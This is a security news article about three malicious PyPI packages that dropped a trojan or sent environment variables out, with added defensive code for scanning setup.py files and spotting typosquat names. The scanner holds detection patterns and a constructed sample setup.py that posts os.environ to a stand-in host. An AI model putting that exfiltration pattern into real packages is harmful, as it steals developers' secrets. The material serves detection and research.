
Malicious PyPI Packages with Over 10,000 Downloads Taken Down

The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on infected machines.

Together, these malicious packages are estimated to have accumulated over 10,000 downloads, mirrors included, according to the researcher's report.

Large scale static analysis led to a malicious discovery

This week, Andrew Scott, a developer and senior product manager at Palo Alto Networks, reported discovering three malicious Python packages on the PyPI open source registry.

These malicious packages, listed below, have been downloaded and mirrored almost 15,000 times in total.

The first version of dpp-client surfaced on PyPI around February 13th, 2021, and the first version of dpp-client1234 on the 14th, whereas the first version of aws-login0tool appeared more recently, on December 1st.

Package name   | Maintainer           | Description                                            | Download counts*
aws-login0tool | davycrockett5729492  | Typosquatting candidate, drops Trojan (EXE) on Windows | 3,042
dpp-client     | cutoffurmind (Alex)  | Exfiltrates environment variables (Unix) and files     | 10,194
dpp-client1234 | cutoffurmind (Alex)  | Exfiltrates environment variables (Unix) and files     | 1,536

*Download counts aggregated from PyPIstats and Pepy.tech may include (automated) mirrors, in addition to organic downloads by developers.

While performing large-scale static analysis of “a large percentage of the packages on PyPI,” Scott came across these mysterious-looking packages.

“I caught these primarily through manual inspection of setup.py files that matched various suspicion strings and regex patterns I was looking for,” Scott tells BleepingComputer in an email interview.

“For example, most cases of exec were benign, but it’s a risky method to use, and commonly leveraged by attackers crafting malicious packages.”

To aid in his research, Scott made use of the Python Packaging Authority’s Bandersnatch open source project.

“Once I had a large number of the package distributions downloaded, I needed to extract them for easier analysis. I put together a pretty simple Python script to recursively iterate through Bandersnatch’s somewhat complicated folder structure then decompressed and extracted each sdist, egg, or wheel out to a flat directory,” explains the developer in his blog post.

After extracting the packages, the developer ran a series of string and regex-based search operations via the grep utility and manually reviewed the results.

“The outcome of this simple approach was actually pretty impactful.”
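The workflow described above (pull distributions from a Bandersnatch mirror, unpack every sdist, egg or wheel into a flat directory, then grep setup.py for risky strings such as exec) can be reproduced with nothing but the Python standard library. The script below is an added example written for this page; it is not Scott's script and not part of the article. The pattern list, the nested directory layout standing in for Bandersnatch's hashed tree, and the two sample distributions (one plain setuptools package, one whose setup.py reads the environment and sends it to an unroutable .invalid host, mirroring the behaviour the article attributes to dpp-client) are all constructed for the demonstration.

```python
import io
import re
import tarfile
import tempfile
import zipfile
from pathlib import Path

# Patterns worth a manual look in setup.py. Constructed list for this example;
# the article only names exec as one of the strings Scott searched for.
SUSPICIOUS_PATTERNS = [
    ("exec-call", re.compile(r"\bexec\s*\(")),
    ("base64-decode", re.compile(r"b64decode\s*\(")),
    ("remote-fetch", re.compile(r"urlopen\s*\(|requests\.(get|post)\s*\(")),
    ("env-read", re.compile(r"os\.environ")),
    ("shell-exec", re.compile(r"subprocess\.|os\.system\s*\(")),
    ("drops-exe", re.compile(r"\.exe['\"]")),
]
ARCHIVE_GLOBS = ("*.tar.gz", "*.zip", "*.whl", "*.egg")


def scan_text(text: str) -> list:
    """Labels of every suspicious pattern that appears in the text."""
    return [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(text)]


def _check_inside(root: Path, name: str) -> None:
    """Refuse archive members whose path would escape the extraction directory."""
    target = (root / name).resolve()
    if target != root.resolve() and root.resolve() not in target.parents:
        raise ValueError(f"archive member escapes extraction dir: {name}")


def extract_distribution(archive: Path, dest: Path) -> Path:
    """Unpack one sdist (.tar.gz/.zip) or wheel/egg into dest/<archive name>."""
    out = dest / re.sub(r"\.(tar\.gz|zip|whl|egg)$", "", archive.name)
    out.mkdir(parents=True, exist_ok=True)
    if tarfile.is_tarfile(archive):
        with tarfile.open(archive) as tf:
            members = tf.getmembers()
            for m in members:
                _check_inside(out, m.name)
            # The 'data' filter (Python 3.12+, backported to some 3.8-3.11
            # releases) also rejects links and device nodes; use it when present.
            kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
            tf.extractall(out, members=members, **kwargs)
    elif zipfile.is_zipfile(archive):
        with zipfile.ZipFile(archive) as zf:
            for name in zf.namelist():
                _check_inside(out, name)
            zf.extractall(out)
    return out


def scan_mirror(mirror_root: Path, dest: Path) -> dict:
    """Walk a mirror tree of any nesting depth, extract each distribution and
    return {archive file name: sorted labels} for archives whose setup.py matched."""
    report = {}
    for pattern in ARCHIVE_GLOBS:
        for archive in sorted(mirror_root.rglob(pattern)):
            out = extract_distribution(archive, dest)
            labels = set()
            for setup_py in out.rglob("setup.py"):
                labels.update(scan_text(setup_py.read_text(errors="replace")))
            if labels:
                report[archive.name] = sorted(labels)
    return report


# Constructed sample packages (never executed; only their text is scanned).
BENIGN_SETUP = 'from setuptools import setup\nsetup(name="goodpkg", version="1.0")\n'
SUSPECT_SETUP = (
    "from setuptools import setup\n"
    "import os, urllib.request\n"
    '# constructed marker of the env-exfiltration behaviour the article describes\n'
    'urllib.request.urlopen("https://example.invalid/c", data=repr(dict(os.environ)).encode())\n'
    'setup(name="evilpkg", version="0.1")\n'
)


def build_sample_mirror(mirror: Path) -> None:
    """Write the two samples into nested dirs standing in for Bandersnatch's layout."""
    good_dir, bad_dir = mirror / "a1" / "goodpkg", mirror / "f9" / "evilpkg"
    good_dir.mkdir(parents=True)
    bad_dir.mkdir(parents=True)
    with zipfile.ZipFile(good_dir / "goodpkg-1.0.zip", "w") as zf:
        zf.writestr("goodpkg-1.0/setup.py", BENIGN_SETUP)
    with tarfile.open(bad_dir / "evilpkg-0.1.tar.gz", "w:gz") as tf:
        data = SUSPECT_SETUP.encode()
        info = tarfile.TarInfo("evilpkg-0.1/setup.py")
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))


def demo() -> dict:
    """Build the sample mirror in a temp dir, scan it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        mirror = Path(tmp) / "web" / "packages"
        build_sample_mirror(mirror)
        return scan_mirror(mirror, Path(tmp) / "extracted")


if __name__ == "__main__":
    for archive, labels in demo().items():
        print(f"{archive}: {', '.join(labels)}")
```

Only the suspect archive shows up in the report, with the env-read and remote-fetch labels; as Scott notes, most hits for a pattern like exec are benign, so the output is a triage queue for manual review rather than a verdict. Pointing scan_mirror at a real Bandersnatch web/packages directory works the same way, since it walks the tree recursively.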

Targets Windows PCs, Linux distros running Apache Mesos

The aws-login0tool package targets Windows machines and downloads a malicious 64-bit executable, normal.exe, from the tryg[.]ga domain.

The malicious executable has been identified as a trojan by 38% of the antivirus engines on VirusTotal, as of writing:

[Screenshot] aws-login0tool drops malicious EXE (BleepingComputer)

By contrast, dpp-client and dpp-client1234 target Linux systems, peek into environment variables and directory listings, and exfiltrate this information to the pt.traktrain[.]com domain.

These packages attempt to pry into a select few directories, including /mnt/mesos, indicating that the malware is specifically looking for files related to Apache Mesos, an open source cluster management product.

[Screenshot] Source code of one of the dpp-client versions (BleepingComputer)

What remains a mystery is the large number of downloads and mirrors for these packages.

At first glance, aws-login0tool appears to be a typosquatting attempt, as the developer points out: the ‘0’ and ‘-’ keys sit next to each other on most keyboards. However, BleepingComputer is not aware of an active PyPI package named ‘aws-login-tool’ that a clever attacker might be tempted to impersonate, although one may have existed in the past.
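The adjacent-key reasoning above (‘0’ sits next to ‘-’) can be turned into a reusable check: generate every name reachable from a candidate by one neighbouring-key substitution and see whether any of them is a known package. The code below is an added example for this page, not from the article or from Scott. The keyboard rows are a US QWERTY approximation that ignores row stagger, and the known-package list is constructed; in particular aws-login-tool is included only as a hypothetical entry, since the article says no such active package is known.

```python
# Rows of a US QWERTY keyboard. Neighbours are the keys beside a key and the
# keys at the same or adjacent column in the rows above and below; the stagger
# between rows is ignored, which is close enough for spotting near-misses.
KEY_ROWS = ["`1234567890-=", "qwertyuiop[]", "asdfghjkl;'", "zxcvbnm,./"]

# Constructed list of names to compare against; aws-login-tool is hypothetical.
KNOWN_PACKAGES = ("aws-login-tool", "boto3", "numpy", "requests")


def _neighbours() -> dict:
    """Map each key to the set of keys physically adjacent to it."""
    nb = {}
    for r, row in enumerate(KEY_ROWS):
        for c, key in enumerate(row):
            adj = set()
            for dr in (-1, 0, 1):
                rr = r + dr
                if not 0 <= rr < len(KEY_ROWS):
                    continue
                for dc in (-1, 0, 1):
                    cc = c + dc
                    if (dr or dc) and 0 <= cc < len(KEY_ROWS[rr]):
                        adj.add(KEY_ROWS[rr][cc])
            nb[key] = adj
    return nb


def adjacent_key_variants(name: str) -> set:
    """All strings obtained by replacing one character of name with a neighbouring key."""
    nb = _neighbours()
    variants = set()
    for i, ch in enumerate(name):
        for alt in nb.get(ch, ()):
            variants.add(name[:i] + alt + name[i + 1:])
    return variants


def typosquat_candidates(name: str, known_packages) -> list:
    """Known package names that are exactly one adjacent-key slip away from name."""
    variants = adjacent_key_variants(name.lower())
    return sorted(p for p in known_packages if p.lower() in variants)


if __name__ == "__main__":
    for candidate in ("aws-login0tool", "boto4", "requests"):
        print(candidate, "->", typosquat_candidates(candidate, KNOWN_PACKAGES))
```

Run against a registry's full name list this is a cheap first filter for a new upload: a name one key-slip away from a popular package deserves a closer look at its setup.py, which is exactly the situation the article describes.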

BleepingComputer also observed that the PyPI page for aws-login0tool, while it was live, contained an explicit disclaimer instructing users not to download the package:

“Please don’t use this… It does bad things… Oh, dear :(”

[Screenshot] PyPI page for the now-removed malicious aws-login0tool package (BleepingComputer)

Likewise, the project pages for dpp-client and dpp-client1234, as seen by BleepingComputer, contained only the word “test” in their description, suggesting that they were, quite likely, part of a proof-of-concept exercise.

This development follows ongoing instances of malware and unwanted content targeting open source repositories like PyPI, npm, and RubyGems.

Last month, JFrog’s security research team reported catching Discord info-stealers among other malicious PyPI packages that abused a “novel exfiltration” technique.

The same month, I wrote about a malicious PyPI package that made a crude attempt at typosquatting ‘boto3’—the Amazon Web Services SDK for Python.

In July this year, six malicious PyPI packages were also caught mining cryptocurrency on developer machines.

Fortunately, the three aforementioned packages discovered by Scott were reported to PyPI admins on December 10th and removed swiftly.

Update 07:26 AM ET: Added quote from Scott.